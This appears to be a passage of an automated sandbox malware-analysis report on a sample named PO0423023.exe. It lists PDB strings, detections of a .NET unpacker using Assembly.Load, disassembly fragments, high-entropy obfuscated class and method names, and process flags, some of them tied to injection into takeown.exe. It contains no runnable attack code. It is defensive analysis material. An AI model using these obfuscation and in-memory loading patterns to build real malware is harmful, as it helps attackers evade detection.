Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uFKwxSqRZbIimWVtjS.exe, 00000005.00000000.2409064441.000000000009E000.00000002.00000001.01000000.0000000D.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000000.2565630013.000000000009E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO0423023.exe, 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2489739936.0000000003718000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2492243743.00000000038C1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: takeown.pdb source: PO0423023.exe, 00000003.00000002.2489347958.0000000001538000.00000004.00000020.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262104447.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tLYg.pdbSHA256 source: PO0423023.exe
Source:	Binary string: wntdll.pdb source: PO0423023.exe, PO0423023.exe, 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2489739936.0000000003718000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2492243743.00000000038C1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: PO0423023.exe, MainForm.cs	.Net Code: InitializeComponent
Source: 0.2.PO0423023.exe.24942b8.1.raw.unpack, HomeView.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	.Net Code: ugnK4QxgU4 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	.Net Code: ugnK4QxgU4 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO0423023.exe.4ce0000.10.raw.unpack, HomeView.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	.Net Code: ugnK4QxgU4 System.Reflection.Assembly.Load(byte[])
Source: 6.2.takeown.exe.40dcd08.2.raw.unpack, MainForm.cs	.Net Code: InitializeComponent
Source: 8.0.uFKwxSqRZbIimWVtjS.exe.350cd08.1.raw.unpack, MainForm.cs	.Net Code: InitializeComponent

Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_09480849 push esp; iretd	0_2_09480851
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_09483EB8 push esp; iretd	0_2_09483EB9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00405053 push ebx; retf	3_2_00405057
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_004120FD push ebx; retf	3_2_004121FA
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0041188E push EFD03D13h; retf	3_2_00411893
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040E197 push ecx; retf	3_2_0040E19A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0041A996 push ss; iretd	3_2_0041A997
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_004121B7 push ebx; retf	3_2_004121FA
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00415A03 push esi; iretd	3_2_00415A0E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00401A08 push B865D3CCh; retf	3_2_00401A07
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_004082D1 push eax; retf	3_2_004082DB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040A468 push ebp; iretd	3_2_0040A477
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040A4D5 push eax; ret	3_2_0040A4D6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00401570 push 3D820602h; retn 74BEh	3_2_004016E4
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040A534 push FFFFFFDDh; ret	3_2_0040A562
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_004115A3 pushad ; retf	3_2_004115E4
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040CE60 push ebx; ret	3_2_0040CE61
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00403610 push eax; ret	3_2_00403612
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_004186FC push ss; ret	3_2_00418707
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_004077C6 pushfd ; ret	3_2_004077C9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0199225F pushad ; ret	3_2_019927F9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019927FA pushad ; ret	3_2_019927F9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C09AD push ecx; mov dword ptr [esp], ecx	3_2_019C09B6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0199283D push eax; iretd	3_2_01992858
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01991200 push eax; iretd	3_2_01991369
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AA09AD push ecx; mov dword ptr [esp], ecx	6_2_03AA09B6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032F23F0 push esi; iretd	6_2_032F23FB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032EE27B push EFD03D13h; retf	6_2_032EE280
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032E41B3 pushfd ; ret	6_2_032E41B6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_0330260F push esi; iretd	6_2_03302610
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_033024E9 push ebx; ret	6_2_03302526

Source: PO0423023.exe

Static PE information: section name: .text entropy: 7.9832865551635095

Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, ltE0avI4I0hyZvCU5j.cs	High entropy of concatenated method names: 'k771sxJFPM', 'UDW1LtmPYL', 'lRA1KmyU3N', 'mOR1bSQNMj', 'ldS1ua6SUB', 'NrG12Ukn7a', 'Ymx1fkOpIx', 'DFXtpZ3ceD', 'lRDtoydspg', 'ufWt7nZ3g0'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, NVxuErESiai0KcC7Cu.cs	High entropy of concatenated method names: 'XKgEouNM97', 'M8AE3oDqip', 'ipMtwrrcF2', 'u8sts2SMjM', 'MtVEkQrTDX', 'toqEd6wkyd', 'nRvEZfQY1C', 'g3bE5cjf84', 'UB8ExW2Qub', 'gXMEvqX7My'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, bN4uOtxHXvrsGksFasU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DrQc5oCk5J', 'Juxcxa40FQ', 'DjXcvWtZ2G', 'LhycQVhl13', 'zf5cSAPley', 'N4icmuwOFN', 'XYXcpaD39L'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, zrXBMPXMSZEvUKF6Q6.cs	High entropy of concatenated method names: 'ni6tbDmnMW', 'Bb7tu0QyvS', 'a3Ftijm6YV', 'GHft2fX6JI', 'OAqtfkAPaf', 'uXctCBy7cp', 'hAmtBfyhnw', 'XNEtltMI9y', 'BFHtgoIW6i', 'AuGtGjYbZ0'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, SxhSIR6Z7u1wCxw4Af.cs	High entropy of concatenated method names: 'ToString', 'fyZPk0XOhk', 'v6CP68RBi1', 'pR3PD8JgHZ', 'sTbPHgwd4R', 'j3RPN6MDka', 'TNmPVe5eYg', 'keCPTAF0jy', 'f2OPqw7eTp', 'IioPOKZvIp'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, eeyM44SVb8AL8WXWa3.cs	High entropy of concatenated method names: 'WR8iXEv40O', 'HqZi9g0Kp1', 'jdZiIU0RGc', 'j7kiAxVYPN', 'h2wiaC7OXS', 'h2FiP11hPw', 'sPPiEBSiFa', 'osWitgoqTq', 'RBUi1VUt2m', 'UdSichUf9l'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, Yi8DKQqZawHni7d49y.cs	High entropy of concatenated method names: 'Dispose', 'nOXs7GKwM3', 'zEHh6qrlTG', 'To6RRwthr3', 'djQs3ghFRu', 'eVAsz28aw4', 'ProcessDialogKey', 'H30hwJVT6C', 'L0vhspkuuC', 'iWChhnsat1'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, zFkDvfDJ1gP7qUP060.cs	High entropy of concatenated method names: 'gvjaWT5RJn', 'LTyadnT7rr', 'G6ia5ocZQ2', 'H6Faxkw0jW', 'Soha6di00t', 'u2maDyojF5', 'LqgaHEpmW0', 'FeuaNYM93Z', 'fBHaVP06wZ', 'xSIaTinNCt'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	High entropy of concatenated method names: 'gMBLU7PRGF', 'pN1LbIj8Yr', 'qAnLuLW45K', 'p6sLiek7qC', 'H32L2pI6p6', 'D31LfoFsYl', 'vZgLCb82p5', 'GDdLB58cnl', 'bQVLl3DfWE', 'rdkLgrdRBC'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, StKVUPZcBlUxaFRHDJ.cs	High entropy of concatenated method names: 'yoau5J6Qtd', 'ov2uxlWgFj', 'Satuv1I2LW', 'vZHuQaLVLC', 'xwpuSuByRn', 'O1DumSSBVJ', 'yOVuppPbrA', 'ehxuobBnYA', 'bkou7xMhlh', 'JtTu3Vr6in'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, G33qJBfUvyZ1kt5MnW.cs	High entropy of concatenated method names: 'eyg2njcgLc', 'e1a2JhNBue', 'FujiDv5r9Q', 'pHDiH2ZqP1', 'thpiN5loDf', 'JwViVd6uCj', 'MvoiTocv43', 'sbwiqoWbbk', 'WaviOimpB5', 'Vg2iWEfLdS'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, bkhDR0gBnt5ESFV6MB.cs	High entropy of concatenated method names: 'B15Cb8du8B', 'gy0CirerEa', 'Q8YCfG4LqW', 'U3Mf3iFxcl', 'V0Qfz3qmnJ', 'F2gCw7HkDc', 'vYxCsNTUEV', 'WunCheZclT', 'VoXCLwSeYF', 'YV5CK0Hhkb'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, EE4LSlpX6xbw7XooTt.cs	High entropy of concatenated method names: 'oktsCTeeSu', 'dJpsB94YsR', 'Brdsg5Qpbm', 'WrCsGSNDyF', 'mifsarZfgy', 'QfbsPr3MVX', 'r2lkaCI5dj7p8X5DvW', 'QPChKk6hNwcgQndaPk', 'hbhssYHtl0', 'S2ksL9NkRI'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, Qp6uO59qxem2HABiiF.cs	High entropy of concatenated method names: 'A1wCyoEoSo', 'Q2fCM1u2uv', 'CIBC44jp3M', 'QsUCX1j6AY', 'dD6CnmT6rI', 'wNmC97XEmZ', 'smOCJOyh9K', 'F2TCImdPbR', 'l2MCAkDeh6', 'elSCjArtwf'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, CZRFDuF4wXk7KVQbuU.cs	High entropy of concatenated method names: 'iAtYIaE0oS', 'NJ1YAra7JL', 'of6Y8jrhQR', 'Y15Y6MD8TU', 'ffYYHChXTO', 'YYMYNdsKHL', 'ExRYT2TCnP', 'WVGYqS1A41', 'nMcYWK5nJV', 's1dYkoqS1D'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, xmwo4nzXQnm6L6biHf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVt1YWNtZQ', 'LqA1a1kL60', 'jCP1PQasNS', 'aSW1EBBlE8', 'i1O1tHDhnZ', 'Xht11Qy7UO', 'DXJ1cAMVit'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, gId7R1xtv5qvltUpOgD.cs	High entropy of concatenated method names: 'boD1yNPC8A', 'aGs1McI90t', 'xfP1436rHx', 'Jpu1X0P0Bf', 'u1d1nFGpjO', 'yFr19xI90S', 'k6V1JbutRm', 'DBa1IBMUFP', 'myM1A86Cpj', 'tDL1juePlx'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, frbspncIj0Mb3SxCEi.cs	High entropy of concatenated method names: 'HSF4jjOHy', 'vqCX6bwlC', 'qv39UeG1B', 'WXxJwj68R', 'lltAAFmke', 'vyBj0paGK', 'fFn24qTtMopvmnMZ8l', 'm1ublQnGgfowp5lBkV', 'YWytWcYjF', 'So7cAjTb4'
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, WIxW0KrGrBv3md8uBH.cs	High entropy of concatenated method names: 'KX6fUPu0PO', 'jAGfubSBOf', 'cvWf2XoLcM', 'L0QfCPxmmy', 'nsWfBsPWlc', 'NKK2SjnA02', 'cgh2meOsYM', 'YIs2p3DJ7u', 'S4X2oGjFZE', 'tyG27GJgSs'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, ltE0avI4I0hyZvCU5j.cs	High entropy of concatenated method names: 'k771sxJFPM', 'UDW1LtmPYL', 'lRA1KmyU3N', 'mOR1bSQNMj', 'ldS1ua6SUB', 'NrG12Ukn7a', 'Ymx1fkOpIx', 'DFXtpZ3ceD', 'lRDtoydspg', 'ufWt7nZ3g0'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, NVxuErESiai0KcC7Cu.cs	High entropy of concatenated method names: 'XKgEouNM97', 'M8AE3oDqip', 'ipMtwrrcF2', 'u8sts2SMjM', 'MtVEkQrTDX', 'toqEd6wkyd', 'nRvEZfQY1C', 'g3bE5cjf84', 'UB8ExW2Qub', 'gXMEvqX7My'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, bN4uOtxHXvrsGksFasU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DrQc5oCk5J', 'Juxcxa40FQ', 'DjXcvWtZ2G', 'LhycQVhl13', 'zf5cSAPley', 'N4icmuwOFN', 'XYXcpaD39L'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, zrXBMPXMSZEvUKF6Q6.cs	High entropy of concatenated method names: 'ni6tbDmnMW', 'Bb7tu0QyvS', 'a3Ftijm6YV', 'GHft2fX6JI', 'OAqtfkAPaf', 'uXctCBy7cp', 'hAmtBfyhnw', 'XNEtltMI9y', 'BFHtgoIW6i', 'AuGtGjYbZ0'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, SxhSIR6Z7u1wCxw4Af.cs	High entropy of concatenated method names: 'ToString', 'fyZPk0XOhk', 'v6CP68RBi1', 'pR3PD8JgHZ', 'sTbPHgwd4R', 'j3RPN6MDka', 'TNmPVe5eYg', 'keCPTAF0jy', 'f2OPqw7eTp', 'IioPOKZvIp'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, eeyM44SVb8AL8WXWa3.cs	High entropy of concatenated method names: 'WR8iXEv40O', 'HqZi9g0Kp1', 'jdZiIU0RGc', 'j7kiAxVYPN', 'h2wiaC7OXS', 'h2FiP11hPw', 'sPPiEBSiFa', 'osWitgoqTq', 'RBUi1VUt2m', 'UdSichUf9l'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, Yi8DKQqZawHni7d49y.cs	High entropy of concatenated method names: 'Dispose', 'nOXs7GKwM3', 'zEHh6qrlTG', 'To6RRwthr3', 'djQs3ghFRu', 'eVAsz28aw4', 'ProcessDialogKey', 'H30hwJVT6C', 'L0vhspkuuC', 'iWChhnsat1'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, zFkDvfDJ1gP7qUP060.cs	High entropy of concatenated method names: 'gvjaWT5RJn', 'LTyadnT7rr', 'G6ia5ocZQ2', 'H6Faxkw0jW', 'Soha6di00t', 'u2maDyojF5', 'LqgaHEpmW0', 'FeuaNYM93Z', 'fBHaVP06wZ', 'xSIaTinNCt'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	High entropy of concatenated method names: 'gMBLU7PRGF', 'pN1LbIj8Yr', 'qAnLuLW45K', 'p6sLiek7qC', 'H32L2pI6p6', 'D31LfoFsYl', 'vZgLCb82p5', 'GDdLB58cnl', 'bQVLl3DfWE', 'rdkLgrdRBC'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, StKVUPZcBlUxaFRHDJ.cs	High entropy of concatenated method names: 'yoau5J6Qtd', 'ov2uxlWgFj', 'Satuv1I2LW', 'vZHuQaLVLC', 'xwpuSuByRn', 'O1DumSSBVJ', 'yOVuppPbrA', 'ehxuobBnYA', 'bkou7xMhlh', 'JtTu3Vr6in'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, G33qJBfUvyZ1kt5MnW.cs	High entropy of concatenated method names: 'eyg2njcgLc', 'e1a2JhNBue', 'FujiDv5r9Q', 'pHDiH2ZqP1', 'thpiN5loDf', 'JwViVd6uCj', 'MvoiTocv43', 'sbwiqoWbbk', 'WaviOimpB5', 'Vg2iWEfLdS'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, bkhDR0gBnt5ESFV6MB.cs	High entropy of concatenated method names: 'B15Cb8du8B', 'gy0CirerEa', 'Q8YCfG4LqW', 'U3Mf3iFxcl', 'V0Qfz3qmnJ', 'F2gCw7HkDc', 'vYxCsNTUEV', 'WunCheZclT', 'VoXCLwSeYF', 'YV5CK0Hhkb'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, EE4LSlpX6xbw7XooTt.cs	High entropy of concatenated method names: 'oktsCTeeSu', 'dJpsB94YsR', 'Brdsg5Qpbm', 'WrCsGSNDyF', 'mifsarZfgy', 'QfbsPr3MVX', 'r2lkaCI5dj7p8X5DvW', 'QPChKk6hNwcgQndaPk', 'hbhssYHtl0', 'S2ksL9NkRI'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, Qp6uO59qxem2HABiiF.cs	High entropy of concatenated method names: 'A1wCyoEoSo', 'Q2fCM1u2uv', 'CIBC44jp3M', 'QsUCX1j6AY', 'dD6CnmT6rI', 'wNmC97XEmZ', 'smOCJOyh9K', 'F2TCImdPbR', 'l2MCAkDeh6', 'elSCjArtwf'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, CZRFDuF4wXk7KVQbuU.cs	High entropy of concatenated method names: 'iAtYIaE0oS', 'NJ1YAra7JL', 'of6Y8jrhQR', 'Y15Y6MD8TU', 'ffYYHChXTO', 'YYMYNdsKHL', 'ExRYT2TCnP', 'WVGYqS1A41', 'nMcYWK5nJV', 's1dYkoqS1D'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, xmwo4nzXQnm6L6biHf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVt1YWNtZQ', 'LqA1a1kL60', 'jCP1PQasNS', 'aSW1EBBlE8', 'i1O1tHDhnZ', 'Xht11Qy7UO', 'DXJ1cAMVit'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, gId7R1xtv5qvltUpOgD.cs	High entropy of concatenated method names: 'boD1yNPC8A', 'aGs1McI90t', 'xfP1436rHx', 'Jpu1X0P0Bf', 'u1d1nFGpjO', 'yFr19xI90S', 'k6V1JbutRm', 'DBa1IBMUFP', 'myM1A86Cpj', 'tDL1juePlx'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, frbspncIj0Mb3SxCEi.cs	High entropy of concatenated method names: 'HSF4jjOHy', 'vqCX6bwlC', 'qv39UeG1B', 'WXxJwj68R', 'lltAAFmke', 'vyBj0paGK', 'fFn24qTtMopvmnMZ8l', 'm1ublQnGgfowp5lBkV', 'YWytWcYjF', 'So7cAjTb4'
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, WIxW0KrGrBv3md8uBH.cs	High entropy of concatenated method names: 'KX6fUPu0PO', 'jAGfubSBOf', 'cvWf2XoLcM', 'L0QfCPxmmy', 'nsWfBsPWlc', 'NKK2SjnA02', 'cgh2meOsYM', 'YIs2p3DJ7u', 'S4X2oGjFZE', 'tyG27GJgSs'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, ltE0avI4I0hyZvCU5j.cs	High entropy of concatenated method names: 'k771sxJFPM', 'UDW1LtmPYL', 'lRA1KmyU3N', 'mOR1bSQNMj', 'ldS1ua6SUB', 'NrG12Ukn7a', 'Ymx1fkOpIx', 'DFXtpZ3ceD', 'lRDtoydspg', 'ufWt7nZ3g0'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, NVxuErESiai0KcC7Cu.cs	High entropy of concatenated method names: 'XKgEouNM97', 'M8AE3oDqip', 'ipMtwrrcF2', 'u8sts2SMjM', 'MtVEkQrTDX', 'toqEd6wkyd', 'nRvEZfQY1C', 'g3bE5cjf84', 'UB8ExW2Qub', 'gXMEvqX7My'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, bN4uOtxHXvrsGksFasU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DrQc5oCk5J', 'Juxcxa40FQ', 'DjXcvWtZ2G', 'LhycQVhl13', 'zf5cSAPley', 'N4icmuwOFN', 'XYXcpaD39L'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, zrXBMPXMSZEvUKF6Q6.cs	High entropy of concatenated method names: 'ni6tbDmnMW', 'Bb7tu0QyvS', 'a3Ftijm6YV', 'GHft2fX6JI', 'OAqtfkAPaf', 'uXctCBy7cp', 'hAmtBfyhnw', 'XNEtltMI9y', 'BFHtgoIW6i', 'AuGtGjYbZ0'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, SxhSIR6Z7u1wCxw4Af.cs	High entropy of concatenated method names: 'ToString', 'fyZPk0XOhk', 'v6CP68RBi1', 'pR3PD8JgHZ', 'sTbPHgwd4R', 'j3RPN6MDka', 'TNmPVe5eYg', 'keCPTAF0jy', 'f2OPqw7eTp', 'IioPOKZvIp'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, eeyM44SVb8AL8WXWa3.cs	High entropy of concatenated method names: 'WR8iXEv40O', 'HqZi9g0Kp1', 'jdZiIU0RGc', 'j7kiAxVYPN', 'h2wiaC7OXS', 'h2FiP11hPw', 'sPPiEBSiFa', 'osWitgoqTq', 'RBUi1VUt2m', 'UdSichUf9l'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, Yi8DKQqZawHni7d49y.cs	High entropy of concatenated method names: 'Dispose', 'nOXs7GKwM3', 'zEHh6qrlTG', 'To6RRwthr3', 'djQs3ghFRu', 'eVAsz28aw4', 'ProcessDialogKey', 'H30hwJVT6C', 'L0vhspkuuC', 'iWChhnsat1'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, zFkDvfDJ1gP7qUP060.cs	High entropy of concatenated method names: 'gvjaWT5RJn', 'LTyadnT7rr', 'G6ia5ocZQ2', 'H6Faxkw0jW', 'Soha6di00t', 'u2maDyojF5', 'LqgaHEpmW0', 'FeuaNYM93Z', 'fBHaVP06wZ', 'xSIaTinNCt'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	High entropy of concatenated method names: 'gMBLU7PRGF', 'pN1LbIj8Yr', 'qAnLuLW45K', 'p6sLiek7qC', 'H32L2pI6p6', 'D31LfoFsYl', 'vZgLCb82p5', 'GDdLB58cnl', 'bQVLl3DfWE', 'rdkLgrdRBC'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, StKVUPZcBlUxaFRHDJ.cs	High entropy of concatenated method names: 'yoau5J6Qtd', 'ov2uxlWgFj', 'Satuv1I2LW', 'vZHuQaLVLC', 'xwpuSuByRn', 'O1DumSSBVJ', 'yOVuppPbrA', 'ehxuobBnYA', 'bkou7xMhlh', 'JtTu3Vr6in'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, G33qJBfUvyZ1kt5MnW.cs	High entropy of concatenated method names: 'eyg2njcgLc', 'e1a2JhNBue', 'FujiDv5r9Q', 'pHDiH2ZqP1', 'thpiN5loDf', 'JwViVd6uCj', 'MvoiTocv43', 'sbwiqoWbbk', 'WaviOimpB5', 'Vg2iWEfLdS'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, bkhDR0gBnt5ESFV6MB.cs	High entropy of concatenated method names: 'B15Cb8du8B', 'gy0CirerEa', 'Q8YCfG4LqW', 'U3Mf3iFxcl', 'V0Qfz3qmnJ', 'F2gCw7HkDc', 'vYxCsNTUEV', 'WunCheZclT', 'VoXCLwSeYF', 'YV5CK0Hhkb'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, EE4LSlpX6xbw7XooTt.cs	High entropy of concatenated method names: 'oktsCTeeSu', 'dJpsB94YsR', 'Brdsg5Qpbm', 'WrCsGSNDyF', 'mifsarZfgy', 'QfbsPr3MVX', 'r2lkaCI5dj7p8X5DvW', 'QPChKk6hNwcgQndaPk', 'hbhssYHtl0', 'S2ksL9NkRI'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, Qp6uO59qxem2HABiiF.cs	High entropy of concatenated method names: 'A1wCyoEoSo', 'Q2fCM1u2uv', 'CIBC44jp3M', 'QsUCX1j6AY', 'dD6CnmT6rI', 'wNmC97XEmZ', 'smOCJOyh9K', 'F2TCImdPbR', 'l2MCAkDeh6', 'elSCjArtwf'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, CZRFDuF4wXk7KVQbuU.cs	High entropy of concatenated method names: 'iAtYIaE0oS', 'NJ1YAra7JL', 'of6Y8jrhQR', 'Y15Y6MD8TU', 'ffYYHChXTO', 'YYMYNdsKHL', 'ExRYT2TCnP', 'WVGYqS1A41', 'nMcYWK5nJV', 's1dYkoqS1D'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, xmwo4nzXQnm6L6biHf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVt1YWNtZQ', 'LqA1a1kL60', 'jCP1PQasNS', 'aSW1EBBlE8', 'i1O1tHDhnZ', 'Xht11Qy7UO', 'DXJ1cAMVit'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, gId7R1xtv5qvltUpOgD.cs	High entropy of concatenated method names: 'boD1yNPC8A', 'aGs1McI90t', 'xfP1436rHx', 'Jpu1X0P0Bf', 'u1d1nFGpjO', 'yFr19xI90S', 'k6V1JbutRm', 'DBa1IBMUFP', 'myM1A86Cpj', 'tDL1juePlx'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, frbspncIj0Mb3SxCEi.cs	High entropy of concatenated method names: 'HSF4jjOHy', 'vqCX6bwlC', 'qv39UeG1B', 'WXxJwj68R', 'lltAAFmke', 'vyBj0paGK', 'fFn24qTtMopvmnMZ8l', 'm1ublQnGgfowp5lBkV', 'YWytWcYjF', 'So7cAjTb4'
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, WIxW0KrGrBv3md8uBH.cs	High entropy of concatenated method names: 'KX6fUPu0PO', 'jAGfubSBOf', 'cvWf2XoLcM', 'L0QfCPxmmy', 'nsWfBsPWlc', 'NKK2SjnA02', 'cgh2meOsYM', 'YIs2p3DJ7u', 'S4X2oGjFZE', 'tyG27GJgSs'

Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
